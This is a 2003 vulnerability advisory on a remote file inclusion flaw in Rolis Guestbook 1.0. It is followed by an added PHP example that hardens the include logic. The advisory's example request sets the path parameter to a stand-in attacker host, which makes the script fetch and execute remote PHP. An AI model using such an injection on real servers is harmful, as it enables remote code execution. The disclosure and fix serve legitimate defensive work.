                    RusH security team | http://www.rsteam.ru

o----------------------------=[ Advisory #13 ]=----------------------------o
o--------------------------------------------------------------------------o
| Product:        Rolis Guestbook                                          |
| Version:        1.0                                                      |
| Vulnerability:  PHP injection (remote file inclusion)                    |
| Vendor:         Koch Roland (roli.ko@gmx.at)                             |
| OffSite:        www.roli.at                                              |
| Vendor status:  The vendor has been informed                             |
o--------------------------------------------------------------------------o
| Date:           16/11/2003                                               |
| Author:         1dt.w0lf // RsT                                          |
o--------------------------------------------------------------------------o

o-------------------------=[ Problem ]:::

Bug found in file insert.inc.php.

The script does not validate $path before using it as the prefix of the
files it includes:

  <?php
  include ($path . "data.inc.php");
  include ($path . "header.inc.php");
  include ($path . "connection_data.inc.php");
  [ skip ]

With register_globals enabled (the PHP 4 default), $path is populated
directly from the query string, so a remote client chooses the include
prefix. Because include() accepts URLs when allow_url_fopen is on (also
the default at the time), the prefix can point at an attacker's web
server, and the three files fetched from there are executed as PHP with
the web server's privileges.

o-------------------------=[ Example ]:::

Example:

  www.site.com/rolis_book_path/insert.inc.php?path=http://hacker.com/

where the attacker hosts the files:

  http://hacker.com/data.inc.php
  http://hacker.com/header.inc.php
  http://hacker.com/connection_data.inc.php

o------------------------=[ Solution ]:::

Edit insert.inc.php:

  <?php
  include ("path.inc.php");          <-- insert this line
  include ($path . "data.inc.php");
  ...

This only closes the hole if path.inc.php assigns $path unconditionally,
so that the value supplied in the query string is overwritten before the
first include runs. Disabling register_globals and allow_url_fopen in
php.ini removes the two preconditions for the attack independently of the
script.

o--------------------=[ for contacts ]:::

1dt.w0lf  - idtwolf[at]pisem[dot]net
RusH team - r00t[at]rsteam[dot]ru
web       - www.rsteam.ru

o------------------------------=[ RU ]:::

The Russian version of this advisory is available at:
http://rst.void.ru/texts/advisory13.htm

o---------------------------------=[ EOF ]=--------------------------------o
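The following is an added example written for this page; it is not Rolis Guestbook's own code and not the vendor's patch. It places the inclusion pattern from the advisory beside a hardened insert.inc.php that pins the include prefix to the script's own directory and whitelists the three file names the advisory lists. The helper name safe_include_path() and the $allowed array are assumptions introduced here for illustration.

```php
<?php
// Added example (not Rolis Guestbook code): the inclusion pattern from the
// advisory beside a hardened replacement. File names are those listed in
// the advisory; safe_include_path() and $allowed are illustrative names.

// --- Vulnerable form (as described in the advisory) ---------------------
// With register_globals=On, $path is whatever ?path=... the client sent.
// $path = "http://hacker.com/" makes include() fetch and execute
// http://hacker.com/data.inc.php (allow_url_fopen=On).
//
//   include ($path . "data.inc.php");
//   include ($path . "header.inc.php");
//   include ($path . "connection_data.inc.php");

// --- Hardened form ------------------------------------------------------
// 1. Never derive the include prefix from request data; pin it to the
//    directory this script lives in. Assigning it here also overwrites
//    any value register_globals put into $path from the query string.
$path = dirname(__FILE__) . DIRECTORY_SEPARATOR;

// 2. Whitelist the files this script may include, so a later regression
//    that reintroduces a request-controlled prefix still cannot pull in
//    arbitrary names.
$allowed = array('data.inc.php', 'header.inc.php', 'connection_data.inc.php');

/**
 * Return the absolute path of $name inside $base, or false if $name is not
 * on the whitelist or does not resolve to a file under $base (covers "..",
 * symlinks and URL prefixes: realpath() never returns a URL).
 */
function safe_include_path($base, $name, $allowed)
{
    if (!in_array($name, $allowed, true)) {
        return false;
    }
    $real_base = realpath($base);
    $real_file = realpath($base . $name);
    if ($real_base === false || $real_file === false) {
        return false;
    }
    // Prefix test: the resolved file must sit below the application dir.
    $prefix = $real_base . DIRECTORY_SEPARATOR;
    if (strncmp($real_file, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return $real_file;
}

foreach ($allowed as $file) {
    $target = safe_include_path($path, $file, $allowed);
    if ($target === false) {
        // Fail closed: never fall back to the raw string.
        header('HTTP/1.0 500 Internal Server Error');
        die('Missing or invalid include file');
    }
    require_once $target;
}
```

The whitelist plus realpath() check is belt-and-braces: fixing $path to dirname(__FILE__) already removes the remote-client influence that the advisory describes. Regardless of the script change, set register_globals = Off and allow_url_fopen = Off in php.ini (on PHP 5.2 and later, allow_url_include = Off is the directive that governs include() of URLs), so that neither precondition for the attack survives a future code regression.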